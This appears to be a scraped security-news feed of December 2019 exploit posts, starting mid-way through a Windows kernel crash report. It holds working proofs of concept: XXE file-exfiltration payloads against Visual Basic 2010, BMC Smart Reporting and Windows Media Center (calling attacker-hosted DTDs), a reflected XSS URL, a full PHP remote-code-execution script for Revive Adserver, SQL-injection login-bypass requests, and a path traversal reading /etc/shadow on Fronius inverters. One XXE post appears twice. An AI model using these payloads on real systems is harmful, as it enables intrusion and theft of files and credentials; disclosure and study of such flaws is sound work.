*(DWORD*)(PrivateData + 0x12c) = 0x000428;
submitCommand->pPrivateDriverData = PrivateData;
D3DKMTSubmitCommand(submitCommand);
*Crash dump*:
STACK_TEXT:
8afae92c 8fe82cb2 8afae958 fffffffd 0000048c
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0
BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000
BasicRender!WarpKMSubmitCommandVirtual+0x87
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6
dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
8afaea08 92b19db6 90114c30 8afaea68 b78da008
dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860
dxgmms2!VidSchiSendToExecutionQueue+0x526
8afaeb90 92b764a9 00000000 945f5a80 00000000
dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000
dxgmms2!VidSchiWorkerThread+0x1a1
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15
eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000
edi=bb26afd8
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe
nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010246
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
8fe8386c c7061060e88f mov dword ptr [esi],offset
BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
Resetting default scope
--------------------------------------------------------------------------------
The vulnerability has only been tested in Windows 10 x86 1803.
CVSS Base Score: 5.5
Credit: Victor Portal
↧
December 4, 2019, 3:50 pm
Microsoft Visual Basic 2010 Express suffers from an XML external entity injection vulnerability.
MD5 | 29b47286367b0567dffc3d07c2f2393d# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt
# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
↧
↧
December 4, 2019, 3:51 pm
BMC Smart Reporting version 7.3 20180418 suffers from an XML external entity injection vulnerability.
MD5 | f6fc537add03d89d9a8d6d49f9cdba3b<!--
# Exploit Title: XXE in BMC Smart Reporting 7.3 20180418
# Date: 11-12-2019
# Exploit Author: David Herrero
# Vendor Homepage: https://www.bmc.com/
# Software Link:
https://docs.bmc.com/docs/itsm90/export-and-import-repository-509983929.html
# Version: BMC Smart Reporting 7.3 20180418
# Tested on: Linux
# CVE : CVE-2019-11216
# Category: vulnerability
1. Description
BMC Smart Reporting 7.3 20180418 allows authenticated XXE within the
import functionality.
One auhtenticated user with admin privileges can import a malicious XML
file and perform XXE
attacks to download local files from the server, or do DoS attacks with
XML expansion attacks.
XXE with direct response and XXE OOB are allowed
2. Proof of Concept
Login with an admin account into BMC Remedy Smart reporting, in the left
menu select the option
"Import", in the "Import File Selection" page upload a malicious XML
file like this one:
XML File for XXE Code in response:
<?xml version="1.0" encoding="UTF-8"?><!-- SmartReporting export file
--><!-- Generated at 2019-01-18 10:14 UTC (+0000) -->
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
<info>
<exportversion>4</exportversion>
<exportsubversion>43</exportsubversion>
<appversion>7.3</appversion>
<buildversion>20180418</buildversion>
<exportdate>2019-01-18 10:14 UTC (+0000)</exportdate>
</info>
<source>
<id>66717</id>
<sourceName>&xxe;</sourceName>
<sourceDescription>testburpDESC</sourceDescription>
<userName>test</userName>
<password>Fi8IDs5q9p4=</password>
<connectionTypeCode>GENERICUSER</connectionTypeCode>
<connectionMethodCode>SSRS</connectionMethodCode>
<connectionDriver>evil.com</connectionDriver>
<databaseURL>http://wvil.com/a.txt</databaseURL>
<databaseTypeCode>GENERICJDBC</databaseTypeCode>
<minConnections>1</minConnections>
<maxConnections>5</maxConnections>
<connectionRefreshTime>3</connectionRefreshTime>
<connectionTimeOut>180</connectionTimeOut>
<accessCode>UNSECURE</accessCode>
<platformTypeCode/>
<maxRowCount>0</maxRowCount>
<broadcastPermitted>true</broadcastPermitted>
<subscribePermitted>true</subscribePermitted>
<dataProfileEnabled>true</dataProfileEnabled>
<localTimezoneCode>AUSTRALIA/SYDNEY</localTimezoneCode>
<secondaryMinConnections>0</secondaryMinConnections>
<secondaryMaxConnections>0</secondaryMaxConnections>
<secondaryConnectionRefreshTime>0</secondaryConnectionRefreshTime>
<secondaryConnectionTimeOut>0</secondaryConnectionTimeOut>
<filterList/>
<sourceParameterList>
<sourceParameter>
<id>0</id>
<parameterTypeCode>TEXT</parameterTypeCode>
<parameterKey>SOURCECLASSNAME</parameterKey>
<parameterIndex>0</parameterIndex>
<parameterValue>com.hof.sources.SSRSSourcePlatformImplementation</parameterValue>
<documentId>0</documentId>
<userVisible>true</userVisible>
</sourceParameter>
</sourceParameterList>
</source>
</data>
After loading the file, the web application should show the file
"/etc/passwd" inside the HTML code.
When reading XML files, the exploit must use OOB XXE because the content
of the file must be included inside "CDATA" tags, the XML payload is as
follow:
XML File for XXE CDATA exfiltration:
!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///path/to/webapps/root/WEB-INF/web.xml">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://attackerip/evil1.xml">
%dtd;
]>
[...]
<sourceName>&all;</sourceName>
[...]
Content of "evil1.xml" is:
<!ENTITY all "%start;%stuff;%end;">
The vulnerable server must be able to reach the file uploaded at
http://attackerip/evil1.xml.
3. Solution:
Remedy Smart Reporting version 9.1.03.001 requires upgrade to the latest
hot fix bundle of this version.
Remedy Smart Reporting version 9.1.04.002 requires upgrade to the latest
hot fix bundle of this version.
Remedy Smart Reporting version 18.05.05 requires upgrade to the latest
hot fix bundle of this version.
Remedy Smart Reporting version 19.02.01 requires upgrade to the latest
hot fix bundle of this version.
4. References
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11216
Vendor advisory:
https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA21O000000dKWrSAM&type=Solution
Product info:
https://docs.bmc.com/docs/itsm90/export-and-import-repository-509983929.html
5. Dates
01/18/2019 - Discovered Vulnerability
04/12/2018 - CVE Reserved
04/17/2018 - Details sent to Vendor
05/07/2019 - Vendor confirms that product is vulnerable
11/12/2019 - Vendor published an advisory
11/12/2019 - Public disclosure
-->
↧
December 4, 2019, 3:51 pm
Microsoft Windows Media Center suffers from an XML external entity injection vulnerability. This vulnerability was originally released back on December 4, 2016, yet remains unfixed.
MD5 | 08852a95d58030559d7cf597ca2a27de[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security
[Vendor]
www.microsoft.com
[Product]
Microsoft Windows Media Center
Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media Center.
[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)
[CVE Reference]
N/A
[Security Issue]
This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed.
Now, to make matters worse I will let you know "mark-of-the-web" MotW does not matter here, its just ignored.
Meaning, if the .MCL file is internet downloaded it gets the MOTW but files still exfiltrated.
Therefore, I am releasing this "anniversary edition" XXE with important motw informations.
This is a fully working remote information disclosure vulnerability that still affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it.
Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc...
Download the ".mcl" file using Microsoft Internet Explorer.
Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists.
Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.
OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro
[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"
# PoC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE knobgobslob [
<!ENTITY % data666 SYSTEM "c:\Windows\system.ini">
<!ENTITY % junk SYSTEM "http://<TARGET-IP>/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>
2) "FindMeThatBiotch.dtd"
<!ENTITY % param666 "<!ENTITY % FindMeThatBiotch SYSTEM 'http://<TARGET-IP>/%data666;'>">
3) Auto exploit PHP .mcl file downloader.
<?php
$url = 'http://<ATTACKER-IP>/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment; filename=\"" . basename($url) . "\"");
readfile($url);
?>
4) python -m SimpleHTTPServer 80
[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: December 4, 2016
MSRC "wont fix"
Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
↧
December 4, 2019, 3:52 pm
WordPress CSS Hero plugin versions 4.0.3 and below suffer from a cross site scripting vulnerability.
MD5 | 67191f29a0b7bf239bf91ecbc08bb983Team,
Document Title
===============
CVE-2019-19133
Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin.
Product Description
===============
CSS Hero WordPress Plugin
A live WordPress Theme editor that works without modifying any of your
theme files. Very low performance footprint: only generates and adds a
single static CSS file to your site.
Homepage: https://www.csshero.org/
CSS Hero is vulnerable to a reflected XSS attack (authenticated).
PoC
===============
Steps:
1) Authenticate to the WordPress application with the CSS Hero plugin installed.
2) Navigate to the following vulnerable link:
hxxp://
vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar
3) JavaScript executes within the context of the browser. The
arbitrary parameter and value are reflected into the returned HTML.
Responsible Disclosure Information
===============
Vendor Contacted: 11/17
Date Patched: 11/20
Patched Version: v.4.0.7
Public Disclosure: 12/2
Cary Hooper
@nopantrootdance
↧
December 4, 2019, 3:52 pm
Revive Adserver version 4.2 suffers from a code execution vulnerability.
MD5 | 798dbf2fc1184deffa0d4ee3b26e6156# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x <= 4.2 RC1
# Tested on: *nix
# CVE : CVE-2019-5434
# Сontains syntax error for protection against skids
<?php
# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
# coded by @crlf, with love for antichat.com
# special thanks to @Kaimi :)
# the script should be used only for educational purposes!
namespace{
(!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x, $url, $code) = $argv);
$source = 'data:text/html;base64,'.base64_encode('#');
$destination = 'plugins/.htaccess';
#$destination = 'var/.htaccess';
if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
$source = 'data:text/html;base64,'.base64_encode($code);
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
#$destination = 'var/default.conf.php';
request($url, $source, $destination);
message('check '.$url.$destination);
function request($url, $source, $destination){
$what = serialize(
['what' =>
new Pdp\Uri\Url(
new League\Flysystem\File( $destination,
new League\Flysystem\File( 'x://'.$source,
new League\Flysystem\MountManager(
new League\Flysystem\Filesystem(
new League\Flysystem\Config,
new League\Flysystem\Adapter\Local('')
),
new League\Flysystem\Plugin\ForcedCopy
)
)
)
)
]
);
$what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));
$xml = '<?xml version="1.0" encoding="ISO-8859-1"?>
<methodCall>
<methodName>openads.spc</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>remote_addr</name>
<value>8.8.8.8</value>
</member>
<member>
<name>cookies</name>
<value>
<array>
</array>
</value>
</member>
</struct>
</value>
</param>
<param><value><string>'.$what.'</string></value></param>
<param><value><string>0</string></value></param>
<param><value><string>dsad</string></value></param>
<param><value><boolean>1</boolean></value></param>
<param><value><boolean>0</boolean></value></param>
<param><value><boolean>1</boolean></value></param>
</params>
</methodCall>';
return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
['http' =>
['method' => 'POST',
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
'header' =>'Content-type: application/x-www-form-urlencoded',
'content'=> $xml
]
])
);
}
function message($str){
print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
}
namespace League\Flysystem\Plugin{
class ForcedCopy{}
}
namespace League\Flysystem{
class Config{
protected $settings = [];
public function __construct(){
$this->settings = ['disable_asserts' => true];
}
}
class Filesystem{
protected $adapter;
protected $config;
public function __construct($config,$adapter){
$this->config = $config;
$this->adapter = $adapter;
}
}
class MountManager{
protected $filesystems = [];
protected $plugins = [];
public function __construct($filesystem, $handler){
$this->filesystems = ['x' => $filesystem];
$this->plugins = ['__toString' => $handler];
}
}
class File{
protected $path;
protected $filesystem;
public function __construct($path, $obj){
$this->filesystem = $obj;
$this->path = $path;
}
}
}
namespace League\Flysystem\Adapter{
class Local{
protected $pathPrefix;
public function __construct($prefix){
$this->pathPrefix = $prefix;
}
}
}
namespace Pdp\Uri{
class Url{
private $host;
public function __construct($file){
$this->host = $file;
}
}
}
↧
↧
December 4, 2019, 3:53 pm
SSDWLAB version 6.1 suffers from an authentication bypass vulnerability.
MD5 | 95b708ca58abb8d946476174d5727a96# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
# Date: 2019-10-01
# Exploit Author: Luis Buendía (exoticpayloads)
# Vendor Homepage: http://www.sbpsoftware.com/
# Version: 6.1
# Tested on: IIS 7.5
# CVE : Pending
#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.
Request to the EditUserPassword Function
POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
Content-Type: text/xml; charset=utf-8
Content-Length: 462
SOAPAction: "http://tempuri.org/EditUserPassword"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<EditUserPassword xmlns="http://tempuri.org/">
<coUser>' or 1=1 --</coUser>
<sOldPwd>string</sOldPwd>
<sNewPwd>string</sNewPwd>
<coLang>ENG</coLang>
</EditUserPassword>
</soap:Body>
</soap:Envelope>
Example of Response when injection is succesfull
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Content-Length: 421
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><EditUserPasswordResponse xmlns="http://tempuri.org/"><EditUserPasswordResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /></EditUserPasswordResult></EditUserPasswordResponse></soap:Body></soap:Envelope>
Request to Login After Successful Request
POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Login"
Content-Length: 406
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:Login xmlns:tns="http://tempuri.org/">
<tns:sUser>' or 1=1 --</tns:sUser>
<tns:sPwd>string</tns:sPwd>
<tns:sLang>ENG</tns:sLang>
</tns:Login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Example of succesfull login
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Connection: close
Content-Length: 422
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><LoginResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /><data>d62cc3c0b2e3413cb8b4a85b0fa6177b</data></LoginResult></LoginResponse></soap:Body></soap:Envelope>
↧
December 4, 2019, 3:54 pm
Fronius Solar Inverter Series with software versions below 3.14.1 (HM 1.12.1) suffer from unencrypted communication and path traversal vulnerabilities.
MD5 | 0caf8457f509b9b49092b83b93420e13SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
=======================================================================
title: Multiple vulnerabilites
product: Fronius Solar Inverter Series
vulnerable version: SW Version <3.14.1 (HM 1.12.1)
fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution
section below
CVE number: CVE-2019-19228, CVE-2019-19229
impact: High
homepage: https://www.fronius.com
found: 2018-10-31
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"A passion for new technologies, intensive research and revolutionary solutions
have been shaping the Fronius brand since 1945. As the technology leader, we
find, develop and implement innovative methods to monitor and control energy
for welding technology, photovoltaics and battery charging. We forge new paths,
try something difficult and succeed where others have failed in achieving what
seems to be impossible. [...]"
Source: http://www.fronius.com/en/about-fronius/company-values
Business recommendation:
------------------------
The vendor automatically performed a fleet update of the solar inverters in the field
in order to patch them. Nevertheless, as not all devices could be reached through such
an update, all remaining users are advised to install the patches provided
by the vendor immediately.
Vulnerability overview/description:
-----------------------------------
1) Unencrypted Communication
The whole communication is handled over HTTP. There is no possibility to
activate an HTTPS web service. This vulnerability cannot be fixed by the vendor
in the current solar inverter generation, see the workaround section below.
2) Authenticated Path Traversal (CVE-2019-19229)
A path traversal attack for authenticated users is possible. This allows getting
access to the operating system of the device and access information like
network configurations and connections to other hosts or potentially other
sensitive information.
This vulnerability has been fixed in March 2019 in version 3.12.5. (HM 1.10.5).
The web server runs with "nobody" privileges, but nearly all files on the
file system are world-readable and can be extracted. This can be seen as
another vulnerability but according to the vendor this cannot be fixed in the
current solar inverter generation.
3) Backdoor Account (CVE-2019-19228)
The web interface has a backdoor user account with the username "today".
This user account has all permissions of all other users ("service",
"admin" and "user") together.
As its name suggests, the password for the user "today" changes every day
and seems to be different to other devices with the same firmware. This
means that some device-specific strings (e.g. the public device-ID) is
mixed up every day to generate a new password.
This account is being used by Fronius support in order to access the
device upon request from the user.
The fix for this issue has been split in two parts. The "password reset"
part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the
support account needs an architectural rework which will be fixed in a
future version (planned for 3.15.1 (HM 1.15.1)).
The passwords for all users of the web interface are stored in plain-text.
This can be seen as another vulnerability and it has been fixed in
version 3.14.1 (HM 1.12.1).
4) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination. Not all of the outdated components can be fixed by the vendor
in the current solar inverter generation, see the workaround section below.
Proof of concept:
-----------------
1) Unencrypted Communication
By using an interceptor proxy this vulnerability can be verified in a
simple way.
2) Authenticated Path Traversal (CVE-2019-19229)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
http://<IP-Address>/admincgi-bin/service.fcgi
Request to read the "/etc/shadow" password file:
┌──────────────────────────────────────────────────────────────────────────────
|GET /admincgi-bin/service.fcgi?action=download&filename=../../../../../etc/shadow
└──────────────────────────────────────────────────────────────────────────────
As response, the file is returned without line breaks. In this example the
line breaks are added for better readability:
┌──────────────────────────────────────────────────────────────────────────────
|HTTP/1.1 200 OK
|Content-Type: application/force-download
|Content-Disposition: attachment; filename=../../../../../etc/shadow
|Connection: close
|Date: Sun, 28 Oct 2018 08:20:27 GMT
|Server: webserver
|
|root:$1$6MNb1Vq3$oU4TaPqQ782Y2ybdWLICh1:0:1:99999:7:::
|nobody:*:10897:0:99999:7:::
|messagebus:$1$6JrvtnWp$T.JvjxjbGTCD.jF7.hhb3.:15638:0:99999:7:::
└──────────────────────────────────────────────────────────────────────────────
By retrieving the file "/etc/issue" an easter-egg was found:
┌──────────────────────────────────────────────────────────────────────────────
| __ ___ _ _ _ _ __ ___ _ __ __ _
|\\ \\ / (_|_|_|_) |_ __ __ _ __ _ __ _ / / | \\| | \\ \\ / /___| |__
| \\ \\/\\/ /| | | | | | ' \\/ _` / _` / _` | / / | |) | |__ \\ \\/\\/ // -_) '_ \\
| \\_/ \\_/ |_|_|_|_|_|_|_|_\\__,_\\__,_\\__,_| /_/ |___/|____| \\_/ \\_/\\___|_.__/
|Congratulations to all non Fronius employees which have come so far :)
└──────────────────────────────────────────────────────────────────────────────
3) Backdoor Account (CVE-2019-19228)
The passwords of the web interface of the affected versions are stored in the file
"/tmp/web_users.conf" in clear text:
┌──────────────────────────────────────────────────────────────────────────────
|admin:<user-password>
|service:<user-password>
|today:<40-bit hash-value>
└──────────────────────────────────────────────────────────────────────────────
The password for "today", which is generated by some algorithm, is suspected
to be a sha1-hash which includes the system-time. A detailed firmware analysis
can reveal the algorithm but has not been performed for this advisory.
4) Outdated and Vulnerable Software Components
By using the path traversal vulnerability (2) a lot of components are found to
be outdated:
* Busybox 1.22.1 (December 23, 2014) multiple CVEs
* Lighttpd 1.4.33 (September 27, 2013) multiple CVEs
* Linux kernel 4.1.39 (March 13, 2017) multiple CVEs
The used SDK is based on the OSELAS toolchain from 2011 and U-Boot from 2012:
* gcc version 4.6.2 (OSELAS.Toolchain-2011.11.1)
* U-Boot 2012.07-3
Vulnerable / tested versions:
-----------------------------
The Fronius Symo 10.0-3-M (1) SWVersion 3.10.3-1 (HM 1.9.2) was tested but more solar
inverters from Fronius share this firmware. The following list has been provided by
the vendor:
Symo Hybrid 3.0-3-M
Symo Hybrid 4.0-3-M
Symo Hybrid 5.0-3-M
Datamanager Box 2.0
Symo 3.0-3-M *)
Symo 3.0-3-S *)
Symo 3.7-3-M *)
Symo 3.7-3-S *)
Symo 4.5-3-M *)
Symo 4.5-3-S *)
Symo 5.0-3-M *)
Symo 6.0-3-M *)
Symo 7.0-3-M *)
Symo 8.2-3-M *)
Symo 10.0-3-M *) (tested)
Symo 10.0-3-M-OS *)
Symo 12.5-3-M *)
Symo 15.0-3-M *)
Symo 17.5-3-M *)
Symo 20.0-3-M *)
Galvo 1.5-1 *)
Galvo 2.0-1 *)
Galvo 2.5-1 *)
Galvo 3.0-1 *)
Galvo 3.1-1 *)
Galvo 1.5-1 208-240 *)
Galvo 2.0-1 208-240 *)
Galvo 2.5-1 208-240 *)
Galvo 3.1-1 208-240 *)
Primo 3.0-1 *)
Primo 3.5-1 *)
Primo 3.6-1 *)
Primo 4.0-1 *)
Primo 4.6-1 *)
Primo 5.0-1 *)
Primo 5.0-1 AUS *)
Primo 5.0-1 SC *)
Primo 6.0-1 *)
Primo 8.2-1 *)
Primo 3.8-1 208-240 *)
Primo 5.0-1 208-240 *)
Primo 6.0-1 208-240 *)
Primo 7.6-1 208-240 *)
Primo 8.2-1 208-240 *)
Primo 10.0-1 208-240 *)
Primo 11.4-1 208-240 *)
Primo 12.5-1 208-240 *)
Primo 15.0-1 208-240 *)
Symo 10.0-3 208-240 *)
